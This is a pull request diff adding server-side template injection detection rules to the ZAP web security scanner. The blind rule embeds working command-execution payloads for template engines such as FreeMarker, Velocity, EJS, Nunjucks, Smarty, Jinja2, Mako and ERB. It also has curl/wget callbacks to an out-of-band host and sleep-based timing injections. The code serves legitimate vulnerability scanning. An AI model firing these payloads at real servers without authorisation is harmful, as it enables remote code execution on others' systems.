### PR TITLE
Add Server Side Template Injection Scan Rule

### DIFF
--- a/addOns/ascanrulesAlpha/ascanrulesAlpha.gradle.kts
+++ b/addOns/ascanrulesAlpha/ascanrulesAlpha.gradle.kts
@@ -11,7 +11,7 @@ zapAddOn {
         dependencies {
             addOns {
                 register("commonlib") {
-                    version.set(">= 1.8.0 & < 2.0.0")
+                    version.set(">= 1.9.0 & < 2.0.0")
                 }
                 register("oast") {
                     version.set(">= 0.7.0")

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiBlindScanRule.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiBlindScanRule.java
@@ -1,0 +1,334 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha;
+
+import java.io.IOException;
+import java.net.SocketException;
+import java.util.concurrent.TimeUnit;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.parosproxy.paros.Constant;
+import org.parosproxy.paros.control.Control;
+import org.parosproxy.paros.core.scanner.AbstractAppParamPlugin;
+import org.parosproxy.paros.core.scanner.Alert;
+import org.parosproxy.paros.core.scanner.Category;
+import org.parosproxy.paros.core.scanner.Plugin;
+import org.parosproxy.paros.network.HttpMessage;
+import org.zaproxy.addon.oast.ExtensionOast;
+import org.zaproxy.zap.model.Tech;
+
+/**
+ * Active Plugin for Server Side Template Injection testing and verification.
+ *
+ * @author DiogoMRSilva (2019)
+ */
+public class SstiBlindScanRule extends AbstractAppParamPlugin {
+
+    /** Prefix for internationalised messages used by this rule */
+    private static final String MESSAGE_PREFIX = "ascanalpha.sstiblind.";
+
+    private static final String SECONDS_PLACEHOLDER = "X_SECONDS_X";
+
+    private static final float ERROR_MARGIN = 0.9f;
+
+    // Most of the exploits have been created by James Kettle @albinowax and the Tplmap creator
+
+    private static final String[] JAVA_COMMAND_EXEC_PAYLOADS = {
+        "<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"X_COMMAND_X\") }", // javaFreemarker https://portswigger.net/blog/server-side-template-injection
+        "#set($engine=\"\")\n"
+                + "#set($proc=$engine.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"X_COMMAND_X\"))\n"
+                + "#set($null=$proc.waitFor())\n"
+                + "${null}" // javaVelocity
+        // https://portswigger.net/blog/server-side-template-injection
+    };
+
+    private static final String[] JAVASCRIPT_COMMAND_EXEC_PAYLOADS = {
+        "{{= global.process.mainModule.require('child_process').execSync('X_COMMAND_X').toString() }}", // Javascript dot
+        "<%= global.process.mainModule.require('child_process').execSync('X_COMMAND_X').toString()%>", // Javascript EJS
+        "#{global.process.mainModule.require('child_process').execSync('X_COMMAND_X').toString()}", // Javascript jade
+        "{{range.constructor(\"return eval(\\\"global.process.mainModule.require('child_process').execSync('X_COMMAND_X').toString()\\\")\")()}}" // Javascript Nunjucks
+    };
+
+    private static final String[] PHP_COMMAND_EXEC_PAYLOADS = {
+        "{system(\"X_COMMAND_X\")}", // PHP smarty
+    };
+
+    private static final String[] PYTHON_COMMAND_EXEC_PAYLOADS = {
+        "{{\"\".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get(\"__builtins__\").get(\"__import__\")(\"subprocess\").check_output(\"X_COMMAND_X\")}}", // python3 jinja2 possibly doesn't work
+        "${__import__(\"subprocess\").check_output(\"X_COMMAND_X\", shell=True)}", // python Mako
+        "{{__import__(\"subprocess\").check_output(\"X_COMMAND_X\", shell=True)}}", // Python
+        // Tornado
+    };
+
+    private static final String[] RUBY_COMMAND_EXEC_PAYLOADS = {
+        "<%=%x(X_COMMAND_X)%>", // Ruby ERB
+        "#{%x(X_COMMAND_X)}" // Ruby Slims
+    };
+
+    private static final String[] WAYS_TO_MAKE_HTTP_REQUESTS_CMD_LINE = {
+        "curl X_URL_X", "wget X_URL_X"
+    };
+
+    private static final Logger LOG = LogManager.getLogger(SstiBlindScanRule.class);
+
+    @Override
+    public int getId() {
+        return 90036;
+    }
+
+    @Override
+    public String getName() {
+        return Constant.messages.getString(MESSAGE_PREFIX + "name");
+    }
+
+    @Override
+    public String getDescription() {
+        return Constant.messages.getString(MESSAGE_PREFIX + "desc");
+    }
+
+    @Override
+    public int getCategory() {
+        return Category.INJECTION;
+    }
+
+    @Override
+    public String getSolution() {
+        return Constant.messages.getString(MESSAGE_PREFIX + "soln");
+    }
+
+    @Override
+    public String getReference() {
+        return Constant.messages.getString(MESSAGE_PREFIX + "refs");
+    }
+
+    @Override
+    public int getCweId() {
+        return 74; // CWE - 74 : Failure to Sanitize Data into a Different Plane ('Injection')
+    }
+
+    @Override
+    public int getWascId() {
+        return 20; // WASC-20: Improper Input Handling
+    }
+
+    @Override
+    public int getRisk() {
+        return Alert.RISK_HIGH;
+    }
+
+    @Override
+    public void scan(HttpMessage msg, String paramName, String value) {
+        if (inScope(Tech.JAVA)) {
+            sendPayloadsToMakeCallBack(paramName, JAVA_COMMAND_EXEC_PAYLOADS);
+            timeBasedTests(paramName, JAVA_COMMAND_EXEC_PAYLOADS);
+        }
+        if (inScope(Tech.JAVASCRIPT)) {
+            sendPayloadsToMakeCallBack(paramName, JAVASCRIPT_COMMAND_EXEC_PAYLOADS);
+            timeBasedTests(paramName, JAVASCRIPT_COMMAND_EXEC_PAYLOADS);
+        }
+        if (inScope(Tech.PYTHON)) {
+            sendPayloadsToMakeCallBack(paramName, PYTHON_COMMAND_EXEC_PAYLOADS);
+            timeBasedTests(paramName, PYTHON_COMMAND_EXEC_PAYLOADS);
+        }
+        if (inScope(Tech.RUBY)) {
+            sendPayloadsToMakeCallBack(paramName, RUBY_COMMAND_EXEC_PAYLOADS);
+            timeBasedTests(paramName, RUBY_COMMAND_EXEC_PAYLOADS);
+        }
+        if (inScope(Tech.PHP)) {
+            sendPayloadsToMakeCallBack(paramName, PHP_COMMAND_EXEC_PAYLOADS);
+            timeBasedTests(paramName, PHP_COMMAND_EXEC_PAYLOADS);
+        }
+    }
+
+    /**
+     * Tries to inject template code that will cause a time delay in the case of being rendered
+     *
+     * @param paramName the name of the parameter where to search for our injection
+     * @param commandExecPayloads the payloads that can possibly execute commands, they need to have
+     *     the word X_COMMAND_X in the place where the command should be inserted
+     */
+    private void timeBasedTests(String paramName, String[] commandExecPayloads) {
+
+        String payloadFormat;
+        for (String sstiFormatPayload : commandExecPayloads) {
+            payloadFormat = sstiFormatPayload.replace("X_COMMAND_X", "sleep X_SECONDS_X");
+            checkIfCausesTimeDelay(paramName, payloadFormat);
+        }
+        // TODO make more requests using other ways of delaying a response
+    }
+
+    /**
+     * Check if the given payloadFormat causes an time delay in the server
+     *
+     * @param paramName the name of the parameter where to search for or injection
+     * @param payloadFormat format string that when formated with 1 argument makes a string that may
+     *     cause a delay equal to the number of second inserted by the format
+     */
+    private void checkIfCausesTimeDelay(String paramName, String payloadFormat) {
+
+        String test2seconds = payloadFormat.replace(SECONDS_PLACEHOLDER, "2");
+        HttpMessage msg = getNewMsg();
+        setParameter(msg, paramName, test2seconds);
+        try {
+            sendAndReceive(msg, false);
+            int time2secondsTest = msg.getTimeElapsedMillis();
+
+            if (time2secondsTest >= TimeUnit.SECONDS.toMillis(2) * ERROR_MARGIN) {
+                // If we detect a response that takes more time that the delay we tried to
+                // cause it is possible that our injection was successful but it also may
+                // have been caused by the network or other variable. So further testing is needed.
+
+                String sanityTest = payloadFormat.replace(SECONDS_PLACEHOLDER, "0");
+                msg = getNewMsg();
+                setParameter(msg, paramName, sanityTest);
+                sendAndReceive(msg, false);
+                int timeWithSanityTest = msg.getTimeElapsedMillis();
+
+                int sumTime =
+                        (int)
+                                (1
+                                        + TimeUnit.MILLISECONDS.toSeconds(
+                                                (long) time2secondsTest + timeWithSanityTest));
+                String testOfSumSeconds =
+                        payloadFormat.replace(SECONDS_PLACEHOLDER, Integer.toString(sumTime));
+                msg = getNewMsg();
+                setParameter(msg, paramName, testOfSumSeconds);
+                sendAndReceive(msg, false);
+                int timeSumSecondsTest = msg.getTimeElapsedMillis();
+
+                if (timeSumSecondsTest >= TimeUnit.SECONDS.toMillis(sumTime) * ERROR_MARGIN) {
+                    this.newAlert()
+                            .setConfidence(Alert.CONFIDENCE_HIGH)
+                            .setUri(msg.getRequestHeader().getURI().toString())
+                            .setParam(paramName)
+                            .setAttack(testOfSumSeconds)
+                            .setMessage(msg)
+                            .raise();
+                }
+            }
+        } catch (SocketException ex) {
+            LOG.debug(
+                    "Caught {} {} when accessing: {}",
+                    ex.getClass().getName(),
+                    ex.getMessage(),
+                    msg.getRequestHeader().getURI());
+        } catch (IOException ex) {
+            LOG.warn(
+                    "SSTI vulnerability check failed for parameter [{}] and payload [{}] due to an I/O error",
+                    paramName,
+                    payloadFormat,
+                    ex);
+        }
+    }
+
+    /**
+     * Function tries to make system commands that call back to ZAP.
+     *
+     * @param paramName the name of the parameter will be used for testing for injection
+     * @param commandExecPayloads the payloads that can possibly execute commands, they need to be
+     *     format strings
+     */
+    private void sendPayloadsToMakeCallBack(String paramName, String[] commandExecPayloads) {
+
+        int allowedNumberCommands = 0;
+        // whe should only run this scanner when the level is High, util then
+        // just time based attacks should be used because of the limitations
+        // in requests numbers
+        if (this.getAttackStrength() == Plugin.AttackStrength.HIGH) {
+            allowedNumberCommands = 1;
+        } else if (this.getAttackStrength() == Plugin.AttackStrength.INSANE) {
+            allowedNumberCommands = 999;
+        }
+
+        int numberCommandsSent = 0;
+
+        ExtensionOast extOast =
+                Control.getSingleton().getExtensionLoader().getExtension(ExtensionOast.class);
+
+        if (extOast == null) {
+            LOG.info("Could not use extension OAST in blind SSTI scan rule");
+            return;
+        }
+
+        for (String requestCmd : WAYS_TO_MAKE_HTTP_REQUESTS_CMD_LINE) {
+            if (numberCommandsSent >= allowedNumberCommands) {
+                break;
+            }
+            numberCommandsSent += 1;
+            for (String sstiFormatPayload : commandExecPayloads) {
+                Alert alert =
+                        newAlert()
+                                .setUri(getBaseMsg().getRequestHeader().getURI().toString())
+                                .setConfidence(Alert.CONFIDENCE_HIGH)
+                                .setSource(Alert.Source.ACTIVE)
+                                .setParam(paramName)
+                                .setOtherInfo(
+                                        Constant.messages.getString(
+                                                MESSAGE_PREFIX + "alert.recvdcallback.otherinfo"))
+                                .build();
+
+                String url;
+                if (extOast.getActiveScanOastService() != null) {
+                    try {
+                        url = "http://" + extOast.registerAlertAndGetPayload(alert);
+                    } catch (Exception e) {
+                        LOG.warn("Failed to register callback on oast", e);
+                        return;
+                    }
+                } else if (extOast.getCallbackService() != null) {
+                    url =
+                            extOast.registerAlertAndGetPayloadForCallbackService(
+                                    alert, SstiBlindScanRule.class.getSimpleName());
+                } else {
+                    LOG.info("Could not use extension OAST on blind SSTI scan rule");
+                    return;
+                }
+
+                String payload =
+                        sstiFormatPayload
+                                .replace("X_COMMAND_X", requestCmd)
+                                .replace("X_URL_X", url);
+                // TODO split the url to avoid FPs
+                HttpMessage msg = getNewMsg();
+                setParameter(msg, paramName, payload);
+                alert.setMessage(msg);
+                alert.setAttack(payload);
+
+                try {
+                    sendAndReceive(msg, false);
+                } catch (SocketException ex) {
+                    LOG.debug(
+                            "Caught {} {} when accessing: {}",
+                            ex.getClass().getName(),
+                            ex.getMessage(),
+                            msg.getRequestHeader().getURI());
+                } catch (IOException ex) {
+                    LOG.warn(
+                            "SSTI vulnerability check failed for parameter [{}] and payload [{}] due to an I/O error",
+                            paramName,
+                            payload,
+                            ex);
+                } catch (Exception ex) {
+                    LOG.error("Failed SSTI rule with payload [{}]", payload, ex);
+                }
+            }
+        }
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java
@@ -1,0 +1,418 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha;
+
+import java.io.IOException;
+import java.net.SocketException;
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Set;
+import org.apache.commons.lang3.RandomStringUtils;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.parosproxy.paros.Constant;
+import org.parosproxy.paros.core.scanner.AbstractAppParamPlugin;
+import org.parosproxy.paros.core.scanner.Alert;
+import org.parosproxy.paros.core.scanner.Category;
+import org.parosproxy.paros.core.scanner.Plugin;
+import org.parosproxy.paros.network.HttpMessage;
+import org.zaproxy.addon.commonlib.SourceSinkUtils;
+import org.zaproxy.zap.extension.ascanrulesAlpha.ssti.DjangoTemplateFormat;
+import org.zaproxy.zap.extension.ascanrulesAlpha.ssti.GoTemplateFormat;
+import org.zaproxy.zap.extension.ascanrulesAlpha.ssti.InputPoint;
+import org.zaproxy.zap.extension.ascanrulesAlpha.ssti.ReflectedSinkPoint;
+import org.zaproxy.zap.extension.ascanrulesAlpha.ssti.SinkPoint;
+import org.zaproxy.zap.extension.ascanrulesAlpha.ssti.StoredSinkPoint;
+import org.zaproxy.zap.extension.ascanrulesAlpha.ssti.TemplateFormat;
+
+/**
+ * Active Plugin for Server Side Template Injection testing and verification.
+ *
+ * @author DiogoMRSilva (2018)
+ */
+public class SstiScanRule extends AbstractAppParamPlugin {
+
+    /** Prefix for internationalised messages used by this rule */
+    private static final String MESSAGE_PREFIX = "ascanalpha.ssti.";
+
+    static final String DELIMITER = "zj";
+
+    private static final float SIMILARITY_THRESHOLD = 0.75f;
+
+    private static String[] errorPolyglots = {"<%={{={@{#{${zj}}%>", "<th:t=\"${zj}#foreach"};
+    // Innocuous versions of the polyglots may be useful in the future if more complex error
+    // detection is required
+    // "\\{*\\<\\%\\=\\{\\{\\=\\{\\@\\{\\#\\{\\$\\{zj\\}\\}\\%\\>\\*}"
+    // the first and last tag are the commentaries from twig
+    // "\\\"\\<th\\:t\\=\\$\\{zj\\}\\#\\foreach"
+
+    private static final TemplateFormat[] TEMPLATE_FORMATS = {
+        new TemplateFormat(" ", " "),
+        new TemplateFormat("{", "}"),
+        new TemplateFormat("${", "}"),
+        new TemplateFormat("#{", "}"),
+        new TemplateFormat("{#", "}"),
+        new TemplateFormat("{@", "}"),
+        new TemplateFormat("{{", "}}"),
+        new TemplateFormat("{{=", "}}"),
+        new TemplateFormat("<%=", "%>"),
+        new TemplateFormat("#set($x=", ")${x}"),
+        new TemplateFormat("<p th:text=\"${", "}\"></p>"),
+        new TemplateFormat(
+                "{", "}", "{@math key=\"%d\" method=\"multiply\" operand=\"%d\"/}"), // Dustjs
+        new DjangoTemplateFormat(),
+        new GoTemplateFormat()
+    };
+
+    private static final String[] WAYS_TO_FIX_CODE_SYNTAX = {"\"", "'", "1", ""};
+
+    private static final Logger LOG = LogManager.getLogger(SstiScanRule.class);
+
+    @Override
+    public int getId() {
+        return 90035;
+    }
+
+    @Override
+    public String getName() {
+        return Constant.messages.getString(MESSAGE_PREFIX + "name");
+    }
+
+    @Override
+    public String[] getDependency() {
+        return new String[] {};
+        // TODO activate when start to work properly
+        // return new String[] {"TestPersistentXSSSpider"};
+    }
+
+    @Override
+    public String getDescription() {
+        return Constant.messages.getString(MESSAGE_PREFIX + "desc");
+    }
+
+    @Override
+    public int getCategory() {
+        return Category.INJECTION;
+    }
+
+    @Override
+    public String getSolution() {
+        return Constant.messages.getString(MESSAGE_PREFIX + "soln");
+    }
+
+    @Override
+    public String getReference() {
+        return Constant.messages.getString(MESSAGE_PREFIX + "refs");
+    }
+
+    @Override
+    public int getCweId() {
+        return 94; // WE-94: Improper Control of Generation of Code ('Code Injection').
+    }
+
+    @Override
+    public int getWascId() {
+        return 20; // WASC-20: Improper Input Handling
+    }
+
+    @Override
+    public int getRisk() {
+        return Alert.RISK_HIGH;
+    }
+
+    /**
+     * Scan for Server Side Template Injection Vulnerabilities
+     *
+     * @param msg a request only copy of the original message (the response isn't copied)
+     * @param paramName the parameter name that need to be exploited
+     * @param value the original parameter value
+     */
+    @Override
+    public void scan(HttpMessage msg, String paramName, String value) {
+
+        // In LOW mode we can only make 6 requests by parameter
+        // so we use an greedy approach where we reduce the number of
+        // request in exchange for an increase in false negatives.
+        if (Plugin.AttackStrength.LOW.equals(this.getAttackStrength())) {
+            efficientScan(msg, paramName, value);
+        } else if (Plugin.AttackStrength.MEDIUM.equals(this.getAttackStrength())
+                || AttackStrength.HIGH.equals(this.getAttackStrength())) {
+            reliableScan(msg, paramName, value, false);
+        }
+        // When the scanner can do more requests it tries less common cases.
+        else {
+            reliableScan(msg, paramName, value, true);
+        }
+    }
+
+    /**
+     * Scan for Server Side Template Injection Vulnerabilities in an efficient way making use of
+     * polyglots and heuristics (less than 6 requests when not vulnerable).
+     *
+     * @param msg a request only copy of the original message (the response isn't copied)
+     * @param paramName the parameter name that need to be exploited
+     * @param value the original parameter value
+     */
+    private void efficientScan(HttpMessage msg, String paramName, String value) {
+
+        // The efficient scanner detects the existence of vulnerabilities by causing
+        // and detecting errors. To detect errors we start by looking to how the
+        // responses change when we send different inputs. Later, with this information
+        // we can detect which changes caused by our inputs are not normal and which
+        // may indicate an error.
+        // To detect the normal changes we send an random input. This input has the same
+        // size as the polyglot to detect errors caused by size limits.
+        String alphabet;
+        if (value != null && value.length() > 0) {
+            alphabet = value;
+        } else {
+            alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+        }
+
+        String referenceValue = RandomStringUtils.random(errorPolyglots[0].length(), alphabet);
+        HttpMessage refMsg = getNewMsg();
+        setParameter(refMsg, paramName, referenceValue);
+        try {
+            sendAndReceive(refMsg, false);
+        } catch (IOException e) {
+            LOG.warn(
+                    "SSTI vulnerability check failed for parameter [{}] due to an I/O error",
+                    paramName,
+                    e);
+            return;
+        }
+
+        // The input point will have associated the several locations where the user
+        // input is reflected("sinks"). This are the locations where it is possible to
+        // see the result of a successful SSTI. The objects representing this "sink"
+        // points contain information about the usual behavior the server has to
+        // different inputs.
+        InputPoint inputPoint =
+                createInputPointWithAllSinks(
+                        getBaseMsg(), value, refMsg, referenceValue, paramName);
+        inputPoint.addReferenceReqToAllSinkPoints(refMsg, paramName, referenceValue);
+
+        if (isStop()) {
+            return;
+        }
+
+        if (hasSuspectBehaviourWithPolyglot(paramName, inputPoint)) {
+            searchForMathsExecution(paramName, inputPoint, false);
+        }
+    }
+
+    private InputPoint createInputPointWithAllSinks(
+            HttpMessage originalMsg,
+            String originalValue,
+            HttpMessage referenceMsg,
+            String referenceValue,
+            String paramName) {
+
+        InputPoint inputPoint = new InputPoint();
+
+        inputPoint.addSinkPoint(
+                new ReflectedSinkPoint(originalMsg, originalValue, referenceMsg, referenceValue));
+
+        Set<Integer> sinks = SourceSinkUtils.getSinksIdsForSource(originalMsg, paramName);
+        if (sinks != null) {
+            for (int sinkMsgId : sinks) {
+                HttpMessage sinkMsg = SourceSinkUtils.getMessage(sinkMsgId);
+                if (sinkMsg == null) {
+                    continue;
+                }
+                inputPoint.addSinkPoint(new StoredSinkPoint(sinkMsg, originalValue));
+            }
+        }
+
+        return inputPoint;
+    }
+
+    /**
+     * Scan for Server Side Template Injection Vulnerabilities in an less efficient way but the
+     * results are more reliable.
+     *
+     * @param msg a request only copy of the original message (the response isn't copied)
+     * @param paramName the parameter name that need to be exploited
+     * @param value the original parameter value
+     * @param fixSyntax declares if should use several prefixes to fix a possible syntax error
+     */
+    private void reliableScan(HttpMessage msg, String paramName, String value, boolean fixSyntax) {
+
+        InputPoint inputPoint = createInputPointWithAllSinks(msg, value, msg, value, paramName);
+
+        if (isStop()) {
+            return;
+        }
+
+        searchForMathsExecution(paramName, inputPoint, fixSyntax);
+    }
+
+    /**
+     * Function checks if the end-point has suspect behaviour when receive one of the polyglot
+     * payloads and remove the elements of input point which do not have error
+     *
+     * @param paramName the name of the parameter will be used for testing for injection
+     * @param inputPoint input point being tested and its possible sinks
+     * @return {@code true} if the server has suspect behaviour when receive polyglot, {@code false}
+     *     otherwise.
+     */
+    private boolean hasSuspectBehaviourWithPolyglot(String paramName, InputPoint inputPoint) {
+        boolean hasSuspectBehavior = false;
+        List<SinkPoint> sinksWithErrors = new ArrayList<>();
+
+        for (String polyglot : errorPolyglots) {
+
+            try {
+                HttpMessage msg = getNewMsg();
+                setParameter(msg, paramName, polyglot);
+                sendAndReceive(msg, false);
+
+                for (SinkPoint sink : inputPoint.getSinkPoints()) {
+                    if (sink.getSimilarityToOriginal(msg, paramName, polyglot)
+                                    / sink.getSimilarityOfReference()
+                            < SIMILARITY_THRESHOLD) {
+                        sinksWithErrors.add(sink);
+                        hasSuspectBehavior = true;
+                    }
+                }
+
+            } catch (SocketException ex) {
+                LOG.debug("Caught {} {}", ex.getClass().getName(), ex.getMessage());
+            } catch (IOException ex) {
+                LOG.warn(
+                        "SSTI vulnerability check failed for parameter [{}] and payload [{}] due to an I/O error",
+                        paramName,
+                        polyglot,
+                        ex);
+            }
+        }
+        // We are only going to search in the sinks were we got error
+        inputPoint.getSinkPoints().removeIf(s -> !sinksWithErrors.contains(s));
+        return hasSuspectBehavior;
+    }
+
+    /**
+     * See if mathematical operation results are seen in some of the sinks
+     *
+     * @param paramName the name of the parameter will be used for testing for injection
+     * @param inputPoint input point being tested and its possible sinks
+     * @param fixSyntax declares if should use several prefixes to fix a possible syntax error
+     */
+    private void searchForMathsExecution(
+            String paramName, InputPoint inputPoint, boolean fixSyntax) {
+        ArrayList<SinkPoint> sinksToTest = new ArrayList<>(inputPoint.getSinkPoints());
+        boolean found = false;
+        String[] codeFixPrefixes = {""};
+        String templateFixingPrefix;
+
+        if (fixSyntax) {
+            codeFixPrefixes = WAYS_TO_FIX_CODE_SYNTAX;
+        }
+
+        for (TemplateFormat sstiPayload : TEMPLATE_FORMATS) {
+
+            if (fixSyntax) {
+                templateFixingPrefix = sstiPayload.getEndTag();
+            } else {
+                templateFixingPrefix = "";
+            }
+
+            for (String codeFixPrefix : codeFixPrefixes) {
+                if (isStop() || found) {
+                    break;
+                }
+
+                List<String> payloadsAndResults = sstiPayload.getRenderTestAndResult();
+                List<String> renderExpectedResults =
+                        payloadsAndResults.subList(1, payloadsAndResults.size());
+
+                // Some template engines only support numbers up to a given size.
+                // If we send a template that results a number above the maximum
+                // supported we get an overflow and the result will not be the one
+                // expected leaving the injection undetected.
+                // To avoid this false negatives we use smaller numbers in the payload
+                // but this increases the probability of creating an operation result
+                // number that already exist in the page leading to false positives.
+                // To reduce this probability we add delimiters to ensure that the
+                // number in the response was generated by our payload.
+                String renderTest =
+                        codeFixPrefix
+                                + templateFixingPrefix
+                                + DELIMITER
+                                + payloadsAndResults.get(0)
+                                + DELIMITER;
+
+                try {
+
+                    HttpMessage newMsg = getNewMsg();
+                    setParameter(newMsg, paramName, renderTest);
+                    sendAndReceive(newMsg, false);
+
+                    for (SinkPoint sink : sinksToTest) {
+
+                        String output = sink.getCurrentStateInString(newMsg, paramName, renderTest);
+
+                        for (String renderResult : renderExpectedResults) {
+                            // Some rendering tests add html tags so we can not only search for
+                            // the delimiters with the arithmetic result inside. Regex searches
+                            // may be expensive, so first we check if the result exist in the
+                            // response and only then we check if it inside the delimiters and
+                            // was originated by our payload.
+                            String regex =
+                                    "[\\w\\W]*"
+                                            + DELIMITER
+                                            + ".*"
+                                            + renderResult
+                                            + ".*"
+                                            + DELIMITER
+                                            + "[\\w\\W]*";
+
+                            if (output.contains(renderResult) && output.matches(regex)) {
+
+                                String attack =
+                                        Constant.messages.getString(
+                                                MESSAGE_PREFIX + "alert.otherinfo",
+                                                sink.getLocation(),
+                                                output);
+
+                                this.newAlert()
+                                        .setConfidence(Alert.CONFIDENCE_HIGH)
+                                        .setUri(newMsg.getRequestHeader().getURI().toString())
+                                        .setParam(paramName)
+                                        .setAttack(renderTest)
+                                        .setOtherInfo(attack)
+                                        .setMessage(newMsg)
+                                        .raise();
+                                found = true;
+                            }
+                        }
+                    }
+                } catch (SocketException ex) {
+                    LOG.debug("Caught {} {}", ex.getClass().getName(), ex.getMessage());
+                } catch (IOException ex) {
+                    LOG.warn(
+                            "SSTI vulnerability check failed for parameter [{}]  due to an I/O error",
+                            paramName,
+                            ex);
+                }
+            }
+        }
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/DjangoTemplateFormat.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/DjangoTemplateFormat.java
@@ -1,0 +1,38 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha.ssti;
+
+/**
+ * This represents the code that is necessary to execute an arithmetic operation in Django template
+ * engine and the expected result of the operation.
+ *
+ * @author DiogoMRSilva (2018)
+ */
+public class DjangoTemplateFormat extends TemplateFormat {
+
+    public DjangoTemplateFormat() {
+        super("{{", "}}", "{{%d0|add:%d0}}");
+    }
+
+    @Override
+    public int getExpectedResult(int number1, int number2) {
+        return number1 * 10 + number2 * 10;
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/GoTemplateFormat.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/GoTemplateFormat.java
@@ -1,0 +1,39 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha.ssti;
+
+/**
+ * This represents the code that is necessary to execute an arithmetic operation in Golang template
+ * engine and the expected result of the operation.
+ *
+ * @author DiogoMRSilva (2018)
+ */
+public class GoTemplateFormat extends TemplateFormat {
+
+    public GoTemplateFormat() {
+        super("{", "}", "{{print \"%d\" \"%d\"}}");
+    }
+
+    @Override
+    public int getExpectedResult(int number1, int number2) {
+        String concatenated = String.format("%d%d", number1, number2);
+        return Integer.parseInt(concatenated);
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/InputPoint.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ssti/InputPoint.java
@@ -1,0 +1,60 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha.ssti;
+
+import java.util.ArrayList;
+import java.util.List;
+import org.parosproxy.paros.network.HttpMessage;
+
+/**
+ * The InputPoint objects represents an input point of an application and stores the locations
+ * (sinks) where that input is going to be reflected.
+ *
+ * @author DiogoMRSilva (2018)
+ */
+public class InputPoint {
+    private final List<SinkPoint> sinkPoints;
+
+    public InputPoint() {
+        sinkPoints = new ArrayList<>();
+    }
+
+    public List<SinkPoint> getSinkPoints() {
+        return sinkPoints;
+    }
+
